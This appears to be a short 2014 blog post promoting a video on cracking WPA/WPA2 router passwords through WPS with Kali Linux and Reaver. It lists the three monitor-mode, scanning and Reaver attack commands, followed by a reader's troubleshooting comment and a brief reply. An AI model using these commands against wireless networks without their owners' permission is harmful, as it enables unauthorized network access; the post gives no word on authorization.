Step by Step Reaver and Kali Linux Cracking a wireless WPA / WPA 2 router

By | August 1, 2014

Here is a new video showing step by step how to crack the password on a router with WPA / WPA2 encryption. Kali Linux and Reaver are used so the router will have to have WPS enabled. Here are the commands used:
airmon-ng start wlan0
wash -i mon0 -C
reaver -i mon0 -b (The BSSID) -vv

I tried several routers, even my own, and can’t get it done. I’ve gotten to the reaver command, but I don’t know what I’m missing because the farthest I’ve gotten is to a “WARNING: Failed to associate with…” error.
As I’ve said, I’ve tried various routers, Is the problem in my PC? which, by the way, IS connected to the wi fi router of my home, so I don’t buy the “Kali is not compatible with the pc wireless adapter” answer I’ve been driven into by my investigations.
    Any help would be apreciated.

The most common way to run Kali is from the DVD with live option or in virtualization such as VMware. The internet is only needed to download Kali and update it.
